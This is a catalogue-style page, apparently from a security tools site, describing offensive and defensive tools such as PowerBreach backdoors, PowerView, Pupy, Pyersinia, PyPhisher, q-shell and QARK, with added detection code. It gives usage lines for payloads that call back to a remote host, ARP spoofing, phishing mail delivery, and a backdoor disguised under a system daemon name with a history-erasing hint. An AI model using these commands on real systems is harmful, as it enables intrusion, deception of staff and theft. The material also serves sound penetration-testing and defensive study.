PowerBreach is a backdoor toolkit that aims to provide the user with a wide variety of methods to backdoor a system. It focuses on diversifying the "trigger" methods, which gives the user flexibility in how to signal to the backdoor that it needs to phone home. PowerBreach focuses on memory-only methods that do not persist across a reboot without further assistance, and it is not a silver bullet when it comes to covert communications.
Helper Functions:
Add-PSFirewallRules - Adds powershell to the firewall on
65K ports. Required Admin
Invoke-CallbackIEX - The location for the various
callback mechanisms. Calls back and executes encoded
payload.

Backdoors Available:
Invoke-EventLogBackdoor: Monitors for failed RDP login attempts. Admin-Yes, Firewall-No, Auditing Reqd
Invoke-PortBindBackdoor: Binds to TCP Port. Admin-No, Firewall-Yes
Invoke-ResolverBackdoor: Resolves name to decide when to callback. Admin-No, Firewall-No
Invoke-PortKnockBackdoor: Starts sniffer looking for trigger. Admin-Yes, Firewall-Yes
Invoke-LoopBackdoor: Calls back on set interval. Admin-No, Firewall-No
Invoke-DeadUserBackdoor: Looks for "dead" user and calls back when it does not exist. Admin-No, Firewall-No

Callback URIs Available:
http://<host:port/resource> - Perform standard http callback
https://<host:port/resource> - Perform standard https callback
dnstxt://<host> - Resolve DNS text record for host which is the payload

PowerPick
This project focuses on allowing the execution of PowerShell functionality without the use of Powershell.exe. Primarily this project uses .NET assemblies/libraries to start execution of the PowerShell scripts.
Many thanks to those in the offensive powershell community.
This work is not ground breaking but hopefully will motivate
offense and defense to understand the implications and lack of
protections available.
PSInject.ps1

This project provides a PowerShell script (psinject.ps1) which implements the Invoke-PSInject function. This script is based on PowerSploit's Invoke-ReflectivePEInjection and reflectively injects the ReflectivePick DLL. It allows for the replacement of the callback URL that is hard-coded into the DLL. See this script for more details.
The script that it calls back for must be base64 encoded. To do this, you can simply use the built-in Linux utility 'base64'.
Example:
import-module psinject.ps1
Invoke-PSInject -Verbose -ProcID 0000 -CBURL http://1.1.1.1/favicon.ico

ReflectivePick

This project is a reflective DLL based on Stephen Fewer's method. It imports/runs a .NET assembly into its memory space that supports the running of PowerShell code using System.Management.Automation. Due to its reflective property, it can be injected into any process using a reflective injector and allows the execution of PowerShell code by any process, not just Powershell.exe. It extends inject/migrate capabilities into PowerShell.
This DLL is meant to be used with PSInject.ps1, which provides the ability to modify the hardcoded callback URL, or with Metasploit after compiling or patching the URL manually.
SharpPick

This project is a .NET executable which allows execution of PowerShell code through a number of methods. The script can be embedded as a resource, read from a URL, appended to the binary, or read from a file. It was originally used as a proof of concept to demonstrate/test the blocking of PowerShell and bypass of AppLocker.
Man Page

sharppick.exe [<flag> <argument>]

flags:
-f <file> : Read script from specified file
-r <resource name> : Read script from specified resource
-d <url> : Read script from URL
-a <delimiter> : Read script appended to current binary after specified delimiter. Delimiter should be a very unique string

More SharpPick details here

PewPewPew
This repo contains scripts that utilize a common pattern to host
a script on a PowerShell webserver, invoke the IEX download
cradle to download/execute the target code and post the results
back to the server, and then post-process any results.
More details here

PowerView
PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various Windows "net *" commands, which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality.
It also implements various useful meta-functions, including some custom-written user-hunting functions which will identify where on the network specific users are logged into. It can also check which machines on the domain the current user has local administrator access on. Several functions for the enumeration and abuse of domain trusts also exist. See function descriptions for appropriate usage and available options.
To run on a machine, start PowerShell with "powershell -exec bypass" and then load the PowerView module with: PS> Import-Module .\powerview.psm1 or load the PowerView script by itself: PS> Import-Module .\powerview.ps1
For detailed output of underlying functionality, pass the -Debug flag to most functions.
For functions that enumerate multiple machines, pass the -Verbose flag to get a progress status as each host is enumerated. Most of the "meta" functions accept an array of hosts from the pipeline.

Misc Functions:
Export-PowerViewCSV - thread-safe CSV append
Set-MacAttribute - sets MAC attributes for a file based on another file or input (from PowerSploit)
Copy-ClonedFile - copies a local file to a remote location, matching MAC properties
Get-IPAddress - resolves a hostname to an IP
Test-Server - tests connectivity to a specified server
Convert-NameToSid - converts a given user/group name to a security identifier (SID)
Convert-SidToName - converts a security identifier (SID) to a group/user name
Convert-NT4toCanonical - converts a user/group NT4 name (i.e. dev/john) to canonical format
Get-Proxy - enumerates local proxy settings
Get-PathAcl - gets the ACLs for a local/remote file path with optional group recursion
Get-UserProperty - returns all properties specified for users, or a set of user:prop names
Get-ComputerProperty - returns all properties specified for computers, or a set of computer:prop names
Find-InterestingFile - searches a local or remote path for files with specific terms in the name
Invoke-CheckLocalAdminAccess - checks if the current user context has local administrator access to a specified host
Get-DomainSearcher - builds a proper ADSI searcher object for a given domain
Get-ObjectAcl - returns the ACLs associated with a specific Active Directory object
Add-ObjectAcl - adds an ACL to a specified Active Directory object
Invoke-ACLScanner - enumerates 1000+ modifiable ACLs on a specified domain
Get-GUIDMap - returns a hash table of current GUIDs -> display names
Get-DomainSID - returns the SID for the specified domain
Invoke-ThreadedFunction - helper that wraps threaded invocation for other functions

net * Functions:
Get-NetDomain - gets the name of the current user's domain
Get-NetForest - gets the forest associated with the current user's domain
Get-NetForestDomain - gets all domains for the current forest
Get-NetDomainController - gets the domain controllers for the current computer's domain
Get-NetUser - returns all user objects, or the user specified (wildcard specifiable)
Add-NetUser - adds a local or domain user
Get-NetComputer - gets a list of all current servers in the domain
Get-NetPrinter - gets an array of all current computers objects in a domain
Get-NetOU - gets data for domain organization units
Get-NetSite - gets current sites in a domain
Get-NetSubnet - gets registered subnets for a domain
Get-NetGroup - gets a list of all current groups in a domain
Get-NetGroupMember - gets a list of all current users in a specified domain group
Get-NetLocalGroup - gets the members of a local group on a remote host or hosts
Add-NetGroupUser - adds a local or domain user to a local or domain group
Get-NetFileServer - gets a list of file servers used by current domain users
Get-DFSshare - gets a list of all distributed file system shares on a domain
Get-NetShare - gets share information for a specified server
Get-NetLoggedon - gets users actively logged onto a specified server
Get-NetSession - gets active sessions on a specified server
Get-NetRDPSession - gets active RDP sessions for a specified server (like qwinsta)
Get-LastLoggedOn - returns the last logged on user for a target host
Get-NetProcess - gets the remote processes and owners on a remote server
Get-UserEvent - returns logon or TGT events from the event log for a specified host
Get-ADObject - takes a domain SID and returns the user, group, or computer object associated with it
Set-ADObject - takes a SID, name, or SamAccountName to query for a specified domain object, and then sets a specified 'PropertyName' to a specified 'PropertyValue'

GPO functions:
Get-GptTmpl - parses a GptTmpl.inf to a custom object
Get-NetGPO - gets all current GPOs for a given domain
Get-NetGPOGroup - gets all GPOs in a domain that set "Restricted Groups" on target machines
Find-GPOLocation - takes a user/group and maps machines they have effective rights over through GPO enumeration and correlation
Find-GPOComputerAdmin - takes a computer and determines who has admin rights over it through GPO enumeration
Get-DomainPolicy - returns the default domain or DC policy

User-Hunting Functions:
Invoke-UserHunter - finds machines on the local domain where specified users are logged into, and can optionally check if the current user has local admin access to found machines
Invoke-StealthUserHunter - finds all file servers utilized in user HomeDirectories, and checks the sessions on each file server, hunting for particular users
Invoke-ProcessHunter - hunts for processes with a specific name or owned by a specific user on domain machines
Invoke-UserEventHunter - hunts for user logon events in domain controller event logs

Domain Trust Functions:
Get-NetDomainTrust - gets all trusts for the current user's domain
Get-NetForestTrust - gets all trusts for the forest associated with the current user's domain
Find-ForeignUser - enumerates users who are in groups outside of their principal domain
Find-ForeignGroup - enumerates all the members of a domain's groups and finds users that are outside of the queried domain
Invoke-MapDomainTrust - tries to build a relational mapping of all domain trusts

MetaFunctions:
Invoke-ShareFinder - finds (non-standard) shares on hosts in the local domain
Invoke-FileFinder - finds potentially sensitive files on hosts in the local domain
Find-LocalAdminAccess - finds machines on the domain that the current user has local admin access to
Find-UserField - searches a user field for a particular term
Find-ComputerField - searches a computer field for a particular term
Get-ExploitableSystem - finds systems likely vulnerable to common exploits
Invoke-EnumerateLocalAdmin - enumerates members of the local Administrators groups across all machines in the domain

Download PowerTools
PROGUARD - JAVA CLASS FILE SHRINKER, OPTIMIZER,
OBFUSCATOR AND PREVERIFIER

ProGuard is a free Java class file shrinker, optimizer, obfuscator, and preverifier. It detects and removes unused
classes, fields, methods, and attributes. It optimizes bytecode
and removes unused instructions. It renames the remaining
classes, fields, and methods using short meaningless names.
Finally, it preverifies the processed code for Java 6 or higher, or
for Java Micro Edition.
Some uses of ProGuard are:
Creating more compact code, for smaller code archives,
faster transfer across networks, faster loading, and
smaller memory footprints.
Making programs and libraries harder to reverse-engineer.
Listing dead code, so it can be removed from the source
code.
Retargeting and preverifying existing class files for Java 6
or higher, to take full advantage of their faster class
loading.
ProGuard's main advantage compared to other Java
obfuscators is probably its compact template-based
configuration. A few intuitive command line options or a simple
configuration file are usually sufficient. The user manual
explains all available options and shows examples of this
powerful configuration style.
ProGuard is fast. It only takes seconds to process programs
and libraries of several megabytes. The results section
presents actual figures for a number of applications.
ProGuard is a command-line tool with an optional graphical
user interface. It also comes with plugins for Ant, for Gradle,
and for the JME Wireless Toolkit.

WHAT IS SHRINKING?

Java source code (.java files) is typically compiled to bytecode (.class files). Bytecode is more compact than Java source
code, but it may still contain a lot of unused code, especially if it
includes program libraries. Shrinking programs such as
ProGuard can analyze bytecode and remove unused classes,
fields, and methods. The program remains functionally
equivalent, including the information given in exception stack
traces.
WHAT IS OBFUSCATION?

By default, compiled bytecode still contains a lot of debugging information: source file names, line numbers, field names, method names, argument names, variable names, etc. This information makes it straightforward to decompile the bytecode and reverse-engineer entire programs. Sometimes, this is not desirable. Obfuscators such as ProGuard can remove the debugging information and replace all names by meaningless character sequences, making it much harder to reverse-engineer the code. It further compacts the code as a bonus.
The program remains functionally equivalent, except for the
class names, method names, and line numbers given in
exception stack traces.
WHAT IS PREVERIFICATION?

When loading class files, the class loader performs some sophisticated verification of the byte code. This analysis makes sure the code can't accidentally or intentionally break out of the sandbox of the virtual machine. Java Micro Edition and Java 6 introduced split verification. This means that the JME preverifier and the Java 6 compiler add preverification information to the class files (StackMap and StackMapTable attributes, respectively), in order to simplify the actual verification step for the class loader. Class files can then be loaded faster and in a more memory-efficient way. ProGuard can perform the preverification step too, for instance allowing older class files to be retargeted at Java 6.
WHAT KIND OF OPTIMIZATIONS DOES PROGUARD SUPPORT?

Apart from removing unused classes, fields, and methods in the shrinking step, ProGuard can also perform optimizations at the
bytecode level, inside and across methods. Thanks to
techniques like control flow analysis, data flow analysis, partial
evaluation, static single assignment, global value numbering,
and liveness analysis, ProGuard can:
Evaluate constant expressions.
Remove unnecessary field accesses and method calls.
Remove unnecessary branches.
Remove unnecessary comparisons and instanceof tests.
Remove unused code blocks.
Merge identical code blocks.
Reduce variable allocation.
Remove write-only fields and unused method parameters.
Inline constant fields, method parameters, and return
values.
Inline methods that are short or only called once.
Simplify tail recursion calls.
Merge classes and interfaces.
Make methods private, static, and final when possible.
Make classes static and final when possible.
Replace interfaces that have single implementations.
Perform over 200 peephole optimizations, like
replacing ...*2 by ...<<1.
Optionally remove logging code.
The positive effects of these optimizations will depend on your
code and on the virtual machine on which the code is executed.
Simple virtual machines may benefit more than advanced
virtual machines with sophisticated JIT compilers. At the very
least, your bytecode may become a bit smaller.
Some notable optimizations that aren't supported yet:
Moving constant expressions out of loops.
Optimizations that require escape analysis (DexGuard does).

Download ProGuard
PROJECT ARTILLERY - FULL SUITE FOR PROTECTION
AGAINST ATTACK ON LINUX AND WINDOWS

Project Artillery is an open source project aimed at the detection of early warning indicators and attacks. The concept is that Artillery will spawn multiple ports on a system, giving the attacker the idea that multiple ports are exposed. Additionally, Artillery actively monitors the filesystem for changes, brute force attacks, and other indicators of compromise. Artillery is a full suite for protection against attack on Linux and Windows based devices. It can be used as an early warning indicator of attackers on your network. Additionally, Artillery integrates into threat intelligence feeds which can notify when a previously seen attacker IP address has been identified. Artillery supports multiple configuration types, different versions of Linux, and can be deployed across multiple systems with events sent centrally.
Artillery is a combination of a honeypot, monitoring tool, and alerting system. Eventually this will evolve into a hardening monitoring platform as well, to detect insecure configurations on *nix systems. It's relatively simple: run ./setup.py and hit yes; this will install Artillery in /var/artillery and edit your /etc/init.d/rc.local to start Artillery on boot.
Features

1. It sets up multiple common ports that are attacked. If someone connects to these ports, it blacklists them forever (to remove blacklisted IPs, remove them from /var/artillery/banlist.txt)
2. It monitors what folders you specify; by default it checks /var/www and /etc for modifications.
3. It monitors the SSH logs and looks for brute force attempts.
4. It will email you when attacks occur and let you know what the attack was.
Be sure to edit the /var/artillery/config to turn on mail delivery, brute force attempt customizations, and what folders to monitor.
Project structure

For those technical folks you can find all of the code in the
following structure:
src/core.py - main central code reuse for things shared between each module
src/monitor.py - main monitoring module for changes to the filesystem
src/ssh_monitor.py - main monitoring module for SSH brute forcing
src/honeypot.py - main module for honeypot detection
src/harden.py - check for basic hardening to the OS
database/integrity.data - main database for maintaining sha512 hashes of filesystem
setup.py - copies files to /var/artillery/ then edits /etc/init.d/artillery to ensure artillery starts per each reboot
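An added example, not Artillery's own code, of the integrity-database idea behind database/integrity.data and src/monitor.py: build a SHA-512 baseline of a monitored tree, store it, and on the next pass report which files were modified, added or removed. The tab-separated database format, the chunk size and the demo directory layout are assumptions made here.

```python
"""Added example (not Artillery's own code): SHA-512 file-integrity baseline
and comparison, modelled on the idea behind database/integrity.data."""
import hashlib
import os
import tempfile
from typing import Dict, Iterable, List


def sha512_file(path: str) -> str:
    """Hex SHA-512 of a file, read in chunks so large files are not loaded whole."""
    digest = hashlib.sha512()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(roots: Iterable[str]) -> Dict[str, str]:
    """Walk each monitored directory and map path -> SHA-512.
    Symlinks are skipped so a planted link cannot pull files from outside
    the monitored tree into the baseline."""
    baseline: Dict[str, str] = {}
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                if os.path.islink(path) or not os.path.isfile(path):
                    continue
                baseline[path] = sha512_file(path)
    return baseline


def save_baseline(baseline: Dict[str, str], db_path: str) -> None:
    """Persist as one 'hexdigest<TAB>path' line per file (format assumed here)."""
    with open(db_path, "w", encoding="utf-8") as fh:
        for path in sorted(baseline):
            fh.write(f"{baseline[path]}\t{path}\n")


def load_baseline(db_path: str) -> Dict[str, str]:
    """Inverse of save_baseline; tolerates blank lines."""
    baseline: Dict[str, str] = {}
    with open(db_path, encoding="utf-8") as fh:
        for line in fh:
            line = line.rstrip("\n")
            if not line:
                continue
            digest, path = line.split("\t", 1)
            baseline[path] = digest
    return baseline


def compare(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Classify every path as modified, added or removed relative to the baseline."""
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: baseline a small web root, then tamper with it
    between two monitoring passes. Paths are returned relative to the root."""
    with tempfile.TemporaryDirectory() as tmp:
        www = os.path.join(tmp, "www")
        os.makedirs(www)
        for name in ("index.html", "login.php", "old.txt"):
            with open(os.path.join(www, name), "w") as fh:
                fh.write(f"original {name}\n")
        db_path = os.path.join(tmp, "integrity.data")
        save_baseline(build_baseline([www]), db_path)

        with open(os.path.join(www, "login.php"), "a") as fh:
            fh.write("appended line\n")            # modified in place
        with open(os.path.join(www, "new.php"), "w") as fh:
            fh.write("unexpected file\n")          # dropped into the tree
        os.remove(os.path.join(www, "old.txt"))    # deleted

        diff = compare(load_baseline(db_path), build_baseline([www]))
        return {k: [os.path.relpath(p, www) for p in v] for k, v in diff.items()}


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

Note that a baseline stored on the same host can itself be tampered with; Artillery's alerting and central event shipping are what make a detected change hard to silence.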

Supported platforms

Linux
Windows

Video Installation of Artillery

Simple "Project Artillery" Installation and Configuration on Linux, from David Kennedy


Download Project Artillery
PROXENET - HACKER FRIENDLY PROXY FOR WEB
APPLICATION PENETRATION TESTS

Proxenet is a hacker friendly proxy for web application penetration tests.
proxenet is a multi-threaded proxy which allows you to manipulate your HTTP requests and responses using your favorite scripting language. No need to learn Java (like for Burp) or Python (like for mitmproxy). proxenet supports heaps of languages (see the section "Language Versions") and more can be easily added.

proxenet is not script kiddie friendly, nor GUI friendly. If this is what you are looking for, here are a few links for you:
ZAP
Burp
ProxyStrike
Or the best way, write your own GUI as a proxenet plugin!
Why ?

The idea behind proxenet came after a lot of frustration from attempting to write extensions for Burp. Moreover, only a few existing proxies support the possibility of adding new extensions. And when they do, they are (one) language specific, despite Burp's persistent attempts to make unnatural bindings (Python over Java, or worse, Ruby over Java).
Being written in pure C, it is fast, efficient and easily pluggable to anything else. It is the ultimate real DIY web proxy for pentest(ers).
Features

Here is a sample of features already supported by proxenet:

Written in C
Fast (heavy thread use)
Efficient (POSIX compatible)
Low memory footprint (for the core)
Can interact with any language
Provides plugins support for the following languages:
  C
  Python
  Lua
  Ruby
  Perl
  Tcl
  Java
SSL
  Full SSL interception (internal CA)
  SSL client certificate authentication
IPv4/IPv6
HTTP Proxy forwarding
White-list/Black-list hosts filtering
Command interface out-of-band
Nice TTY colors :D
100% Open-Source
... and more !
The best of both worlds?

Some people might miss the beautiful interface some other GUI-friendly proxies provide. So be it! Plug proxenet as a relay behind your favorite Burp, ZAP, ProxyStrike, burst, etc. and enjoy the show!
How to start
$ git clone https://github.com/hugsy/proxenet.git
$ cd proxenet && cmake . && make

Download Proxenet
PROXYDROID - SET PROXYS (HTTP / SOCKS4 / SOCKS5)
ON YOUR ANDROID DEVICES

ProxyDroid is an app that can help you to set the proxy (http /
socks4 / socks5) on your android devices.
FEATURES

1. Support HTTP / HTTPS / SOCKS4 / SOCKS5 proxy
2. Support basic / NTLM / NTLMv2 authentication methods
3. Individual proxy for only one or several apps
4. Multiple profiles support
5. Bind configuration to WIFI's SSID / Mobile Network (2G / 3G)
6. Widgets for quickly switching on/off proxy
7. Low battery and memory consumption (written in C and compiled as native binary)
8. Bypass custom IP address
9. DNS proxy for users behind a firewall that does not allow resolving external addresses
10. PAC file support (only basic support, thanks to Rhino)

Download ProxyDroid
PUPY - MULTI-PLATFORM REMOTE ADMINISTRATION
TOOL
Pupy is an opensource, multi-platform Remote Administration
Tool written in Python. On Windows, Pupy uses reflective dll
injection and leaves no traces on disk.

Features :

On Windows, the Pupy payload is compiled as a reflective DLL and the whole Python interpreter is loaded from memory. Pupy does not touch the disk :)
Pupy can reflectively migrate into other processes
Pupy can remotely import, from memory, pure Python packages (.py, .pyc) and compiled Python C extensions (.pyd). The imported Python modules do not touch the disk. (.pyd memory import currently works on Windows only; .so memory import is not implemented.)
Modules are quite simple to write and Pupy is easily extensible.
Pupy uses rpyc and a module can directly access Python objects on the remote client
We can also access remote objects interactively from the Pupy shell, and even auto-completion of remote attributes works!
The communication channel currently works as an SSL reverse connection, but a bind payload will be implemented in the future
All the non-interactive modules can be dispatched on multiple hosts in one command
Multi-platform (tested on Windows 7, Windows XP, Kali Linux, Ubuntu)
Modules can be executed as background jobs
Commands and scripts running on remote hosts are interruptible
Auto-completion and nice colored output :-)
Command aliases can be defined in the config

Implemented Modules :

migrate (windows only)
  inter-process architecture injection also works (x86->x64 and x64->x86)
keylogger (windows only)
persistence (windows only)
screenshot (windows only)
webcam snapshot (windows only)
command execution
download
upload
socks5 proxy
local port forwarding
interactive shell (cmd.exe, /bin/sh, ...)
interactive python shell
shellcode exec (thanks to @byt3bl33d3r)

Quick start
In these examples the server is running on a Linux host (tested on Kali Linux) and its IP address is 192.168.0.1.
The clients have been tested on Windows 7, Windows XP, Kali Linux, Ubuntu and Mac OS X 10.10.5.

generate/run a payload

for Windows
./genpayload.py 192.168.0.1 -p 443 -t exe_x86 -o pupyx86.exe

You can also use -t dll_x86 or dll_x64 to generate a reflective DLL and inject/load it by your own means.

for Linux
pip install rpyc  # (or manually copy it if you are not admin)
python reverse_ssl.py 192.168.0.1:443

for Mac OS X
easy_install rpyc  # (or manually copy it if you are not admin)
python reverse_ssl.py 192.168.0.1:443

start the server

1. optionally edit pupy.conf to change the bind address / port
2. start the pupy server:
./pupysh.py
Some screenshots

The original page shows screenshots (images not reproduced here) with the following captions: list connected clients; help; execute python code on all clients; execute a command on all clients (the exception is retrieved in case the command does not exist); use a filter to send a module only to selected clients; migrate into another process; interactive shell; interactive python shell.
example: How to write a MsgBox module

First of all, write the function/class you want to import on the remote client. In the example we create the file pupy/packages/windows/all/pupwinutils/msgbox.py:

import ctypes
import threading

def MessageBox(text, title):
    # Run the Win32 MessageBoxA call on a daemon thread so the remote call
    # returns immediately instead of blocking until the box is dismissed.
    t = threading.Thread(target=ctypes.windll.user32.MessageBoxA,
                         args=(None, text, title, 0))
    t.daemon = True
    t.start()

Then simply create a module to load our package and call the function remotely:

from pupylib.PupyModule import *   # provides PupyModule, PupyArgumentParser, windows_only

__class_name__ = "MsgBoxPopup"     # pupy module convention: the class to load

class MsgBoxPopup(PupyModule):
    """ Pop up a custom message box """

    def init_argparse(self):
        self.arg_parser = PupyArgumentParser(prog="msgbox", description=self.__doc__)
        self.arg_parser.add_argument('--title', help='msgbox title')
        self.arg_parser.add_argument('text', help='text to print in the msgbox :)')

    @windows_only
    def is_compatible(self):
        pass

    def run(self, args):
        # Push the package to the client (from memory) and call it over rpyc
        self.client.load_package("pupwinutils.msgbox")
        self.client.conn.modules['pupwinutils.msgbox'].MessageBox(args.text, args.title)
        self.log("message box popped !")
Dependencies
rpyc (https://github.com/tomerfiliba/rpyc)

Roadmap and ideas

Some ideas without any priority order:

support for https proxy
bind instead of reverse connection
add offline options to payloads like enable/disable certificate checking, embed offline modules (persistence, keylogger, ...), etc.
integrate scapy in the windows dll :D (that would be fun)
work on stealthiness and modules under unix systems
webcam snap
mic recording
socks5 udp support
remote port forwarding
perhaps write some documentation
...
any cool idea ?

Download Pupy
PYERSINIA - NETWORK ATTACK TOOL

Pyersinia is a tool similar to Yersinia, but implemented in Python using Scapy. Its main objective is the execution of network attacks such as ARP spoofing, DHCP DoS and STP DoS, among others. The community can add new attacks to the tool in a simple way, using plugins, because Pyersinia uses the STB (Security Tools Builder) framework.

WHAT'S NEW?
Adding new attacks to the tool is a simple task because it uses the STB (Security Tool Builder) framework. New attacks are added as plugins.

INSTALLATION
Installing Pyersinia is easy:
$ python -m pip install pyersinia

Or install from PyPI:

# pip install pyersinia
QUICK START
You can display the inline help with -h; it prints:

positional arguments:
  arp_spoof_TARGET
  arp_spoof_VICTIM

optional arguments:
  -h, --help       show this help message and exit
  -v, --verbosity  verbosity level
  -a ATTACK_TYPE   choose supported attack type
  -i IFACE         choose network interface

supported attacks:
  arp_spoof, dhcp_discover_dos, stp_tcn, stp_conf, stp_root

examples:
  python pyersinia.py -a arp_spoof 127.0.0.1 127.0.0.1
  python pyersinia.py -a stp_root -i eth0
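The arp_spoof attack listed above poisons a victim's ARP cache by answering for an IP address from a different MAC. The defensive counterpart is to watch for exactly that symptom. The following is an added example, not part of Pyersinia or the page, showing a minimal ARP-conflict detector; the ArpReply records and the sample traffic are constructed for the example (in practice they would come from a packet capture), and the pinned-gateway option is an assumption about how one would want to use such a monitor.

```python
from collections import namedtuple

# One ARP reply as a detector would see it; constructed for this example.
ArpReply = namedtuple("ArpReply", "timestamp sender_ip sender_mac")

# Constructed sample traffic: the gateway 192.168.0.1 answers from its real
# MAC, then a second host starts claiming the gateway's IP (the effect an
# arp_spoof run produces on the segment).
SAMPLE_REPLIES = [
    ArpReply(1.0, "192.168.0.1", "aa:bb:cc:00:00:01"),
    ArpReply(2.0, "192.168.0.20", "aa:bb:cc:00:00:14"),
    ArpReply(3.0, "192.168.0.1", "aa:bb:cc:00:00:01"),
    ArpReply(4.0, "192.168.0.1", "de:ad:be:ef:00:99"),  # conflicting claim
    ArpReply(5.0, "192.168.0.1", "de:ad:be:ef:00:99"),
]


def detect_arp_conflicts(replies, pinned=None):
    """Return (timestamp, ip, expected_mac, seen_mac) for every reply whose
    sender MAC differs from the MAC already recorded for that IP.

    pinned maps IPs (e.g. the gateway) to the MAC they must always use; those
    bindings are never overwritten, so every spoofed reply for them is
    reported, not just the first one."""
    pinned = {ip: mac.lower() for ip, mac in (pinned or {}).items()}
    table = dict(pinned)  # learned IP -> MAC bindings, seeded with the pins
    alerts = []
    for r in replies:
        mac = r.sender_mac.lower()
        known = table.get(r.sender_ip)
        if known is not None and known != mac:
            alerts.append((r.timestamp, r.sender_ip, known, mac))
        if r.sender_ip not in pinned:
            table[r.sender_ip] = mac  # unpinned hosts may legitimately change
    return alerts


if __name__ == "__main__":
    gateway = {"192.168.0.1": "aa:bb:cc:00:00:01"}
    for ts, ip, expected, seen in detect_arp_conflicts(SAMPLE_REPLIES, pinned=gateway):
        print("t=%.1f ARP conflict for %s: expected %s, saw %s" % (ts, ip, expected, seen))
```

Without a pinned entry the detector learns the new binding after the first conflict and stays quiet, which is the right behaviour for hosts that legitimately change hardware; pinning the gateway makes every spoofed reply for it visible, which is what you want on a segment where an STP or ARP attack is suspected.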

Download Pyersinia
PYPHISHER - A SIMPLE PYTHON TOOL FOR PHISHING
If you are looking to run a phishing test or demonstration, you can check PyPhisher. This tool was created for the purpose of phishing during a penetration test. It is Python based and provides the user a way to send emails with a customized template that he designs: you can use an HTML format that is similar to any organization's and replace the links that you want to send.
This was inspired by SpearPhisher beta by Dave Kennedy from TrustedSec and a feature found in Cobalt Strike by Raphael Mudge from Strategic Cyber.
Usage:
PyPhisher.py --server mail.server.com --port 25 --username user --password password --html phish.txt --url_replace phishlink.com --subject Read!! --sender important@phish.com --sendto target@company.com
Available options:
--server       The SMTP server that you are going to be using to send the email
--port         The port number that is set up for SMTP
--html         The pre-crafted HTML that will be used in the email
--url_replace  The URL that will be used to replace all links in the email
--subject      The subject that will appear in the email message
--sender       The sender that will appear on the email
--sendto       Who you would like to send the email to
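The --url_replace option rewrites every link in the template to one host, which leaves a detectable trace: the visible link text still names the imitated organization while the href points elsewhere. The following is an added example, not part of PyPhisher or the page, of a mail-gateway style check for that pattern; the sample message and the sender domain are constructed for the example, and the same_org rule (subdomains of the sender's domain are trusted) is an assumption.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Matches something that looks like a hostname inside the visible link text.
HOST_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.IGNORECASE)


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def same_org(host, domain):
    """True if host is domain itself or a subdomain of it (assumed trust rule)."""
    host, domain = host.lower(), domain.lower()
    return host == domain or host.endswith("." + domain)


def link_mismatches(html, sender_domain):
    """Return (reason, visible_text, href) for every suspicious anchor."""
    collector = LinkCollector()
    collector.feed(html)
    findings = []
    for href, text in collector.links:
        host = (urlparse(href).hostname or "").lower()
        shown = HOST_RE.search(text)
        if shown and shown.group(1).lower() != host:
            # The text names one domain but the link goes to another: the
            # classic pattern produced by wholesale URL replacement.
            findings.append(("text/href mismatch", text, href))
        elif host and not same_org(host, sender_domain):
            findings.append(("link outside sender domain", text, href))
    return findings


# Constructed sample message, in the style of a template whose links were all
# pointed at one replacement host.
SAMPLE_MAIL = """<html><body>
<p>Please review your account at
<a href="http://phishlink.com/login">https://www.company.com/login</a>.</p>
<p>Questions? Visit our <a href="https://help.company.com">help center</a>.</p>
<p><a href="http://phishlink.com/unsubscribe">unsubscribe</a></p>
</body></html>"""

if __name__ == "__main__":
    for reason, text, href in link_mismatches(SAMPLE_MAIL, "company.com"):
        print("%-26s %-32s -> %s" % (reason, text, href))
```

The first rule catches the strongest signal (a URL shown to the reader that does not match where the link goes); the second is noisier, since legitimate mail often links to third parties, so in a real gateway it would feed a score rather than a block decision.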

Download PyPhisher
Q-SHELL - QUICK SHELL FOR UNIX ADMINISTRATOR
q-shell is a quick shell for remote login into Unix systems. It uses the Blowfish cipher to protect the data transported between client and server. You get two programs: 'qsh' for the client and 'qshd' for the server; both can be renamed to any name you prefer.
Compile

Just enter 'make' and it will compile automatically, but you must input the server key.
Usage

1. server:
Just run qshd on the server:
$ ./qshd
But you may prefer to run it after renaming it to something else, such as:
$ mv qshd smbd
$ export PATH=.:$PATH
$ smbd

2. client:
Set some environment variables, then run qsh:
$ export _IP=127.0.0.1
$ export _PORT=2800
$ unset _P
$ ./qsh shell
Now you are logged into the server $_IP.

More functions

q-shell includes more functions to manage systems:

1. put/get files:
$ ./qsh get /path/to/server/file .
$ ./qsh put /path/to/local/file /path/to/server/file

2. run a command on the server:
$ ./qsh exec 'ls -l /bin'

3. update the server program:
$ ./qsh update /path/to/local/qshd
This function will update the remote qshd and run it again.

4. automatically run a command on many servers:
$ for i in {10..20} ; do
    export _IP=192.168.0.$i
    export _PORT=2800
    export _P=key    # set key
    ./qsh exec 'ls -l /bin'
  done

Note: qsh reads the server key from $_P, so you should erase all shell history after using $_P.

5. update password
Starting with version 3.2, you can update the password as below:
$ ./qsh passwd

Download Q-shell
QARK - TOOL TO LOOK FOR SEVERAL SECURITY RELATED ANDROID APPLICATION VULNERABILITIES

Quick Android Review Kit - This tool is designed to look for several security-related Android application vulnerabilities, either in source code or packaged APKs. The tool is also capable of creating "Proof-of-Concept" deployable APKs and/or ADB commands capable of exploiting many of the vulnerabilities it finds. There is no need to root the test device, as this tool focuses on vulnerabilities that can be exploited under otherwise secure conditions.
Usage

To run in interactive mode:

$ python qark.py

To run in headless mode:

